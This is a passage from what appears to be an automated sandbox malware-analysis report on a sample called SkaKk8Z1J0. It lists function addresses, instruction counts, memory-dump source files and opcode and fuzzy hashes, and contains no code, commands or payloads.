                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aff5b575bdc1cbf128a6fcaf21673d610ba054c2e19d9dceb1adbeeb882f19a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B416AB52483849FE7258B24CC967B777E0EF96704F18946CE4C6CB292E7294903DB1A
                                                                                                                                                                                                                                                  Function 0076B08B Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                  • Instruction ID: 49151eb6fc418e284b7d20941b8948b43a6e73f704d9303352dd8632774abd16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A41A3A010C3D18ADB398F3490607BBBFD0AF93218F24599DC6D6A7683D7394447CB5A
                                                                                                                                                                                                                                                  Function 0042AE24 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                  • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                                  Function 0077B2C2 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                  • Instruction ID: 21d546a7ae603b834f83fc80a0a4b73eb7ab7e6d2e4391678c2edcfc7e76f110
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3641BBB1A587548FCB24AF64DCC067EB3A1EF86360F2EC52CD5E917291E7649C408245
                                                                                                                                                                                                                                                  Function 0043C020 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e4e9279ef52f96599ba60b9f495eba6a2778b73f1ce77f20ed8f4ad1faa0dcde
                                                                                                                                                                                                                                                  • Instruction ID: bdc763d3058119611c7ecd8a8528ac1cd9b09ae5f9eb0b7e174c524916cf2ae7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4e9279ef52f96599ba60b9f495eba6a2778b73f1ce77f20ed8f4ad1faa0dcde
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A41F33A308610CFCB08CF78E9E055A73A2FBCB315F29847DD54547622C775A956CB44
                                                                                                                                                                                                                                                  Function 0077B2C4 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                  • Instruction ID: eb0eb4477c80793e8190735871cb15567a14d8252b8088f0064b1fd74104a085
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96318875A587588FC728EFA4E8C067AB3B1EB8B310F2E853CC5E90B351D7749D408649
                                                                                                                                                                                                                                                  Function 0043B05D Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                  • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                                                                                                                                                  Function 007660F7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                  • Instruction ID: 86d3121f0b94191ddc6e3c28c5c8c9938b87a393ef1e8a29022f62d2fa52c5d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E4182B26187908BD734CF24C85179FBAF1EBD1214F498E2CD4DA9B345E73589058B87
                                                                                                                                                                                                                                                  Function 0076B05B Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                  • Instruction ID: 3b58d7a6c8fe9b2428707d50a9e90a3383c9c6d2f92f67214dc19bc379c5c7fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D33186A01083D18ADB398F259020BFBBBE0AF93319F14499DC7D6A7683D7384047CB5A
                                                                                                                                                                                                                                                  Function 0076C6C3 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                  • Instruction ID: ef25c2c8795a7e5fd59cf1c988dca61db8cd00e31f3824bf826816e11dfbb35d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 283106741183C14BE7A68B289860BBABBD2DF93304F28596CD4CB8B192DB295845CB56
                                                                                                                                                                                                                                                  Function 0042C45C Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                  • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                  Function 0042ADF4 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                  • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                  Function 007689C0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                  • Instruction ID: b7ee014e426f60475913b093123995ab3f4ac58ac2ec069f7a09f5b51419176c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C3151722182049FC764CFA48C8067AB322EB92744F2C8A3EDD8683342DA78CD018643
                                                                                                                                                                                                                                                  Function 0074DA09 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                  • Instruction ID: 5fedf85294c2adeda3ba1aa436ece3ae7ca255b16685472d15cccb2e7a02f9c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3331C3787186019AE775AB19CC80B367767FBC7300F69D62DE0C6936A8DB38AC118B54
                                                                                                                                                                                                                                                  Function 0040D7A2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                  • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                  Function 0077BC08 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                  • Instruction ID: fe765b3cf36f95fe5960ca30f0803e2fb3c7742e8db6e8b6eae41f71628e8f17
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A213B217087910BDB19DE3988D2237FBD39BD7254F08C63ED4A6875D5DA34E9058604
                                                                                                                                                                                                                                                  Function 0043B9A1 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                  • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                                  Function 00756544 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                  • Instruction ID: b2e2fb8742a2513f483bae1f66e94b2aeb2d1d92b77045f9dbae08209458965d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27212374604B019FD360CF28C880B67B7A3EBC6321F64C668D8958B699DB78EC56CB44
                                                                                                                                                                                                                                                  Function 0043BF40 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                  • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                                                                                                                                                  Function 00742E37 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                                                                                                                                                                                                                  • Instruction ID: 8ab420713aea8f4a0074aa2b6dfa0e3bec98f55a9fc22544410be8ac901dea4f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7611C473F1653147A350DE369C986166393ABC5314B9A0534E941D7282CB3AFD26E294
                                                                                                                                                                                                                                                  Function 00402BD0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                                                                                                                                                                                                                  • Instruction ID: d3efd499d3fbc33036e2032367fc91d0155dae543bbe3474a39f1f7b468c3dc9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A11B273F2A92107F3549E369C9C21B6352E7C531471A0535D941A72C1CA79F902E168
                                                                                                                                                                                                                                                  Function 0076552B Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                  • Instruction ID: 22fb08c82029b5c74b16ccbddb945c000cd415b23a541f7360a00457e9d88ad7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60112331644340ABCB18CF64D8D1A7EB3A1AB96301F48943CE9D3C3652C67CC800AF46
                                                                                                                                                                                                                                                  Function 0077B3FC Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
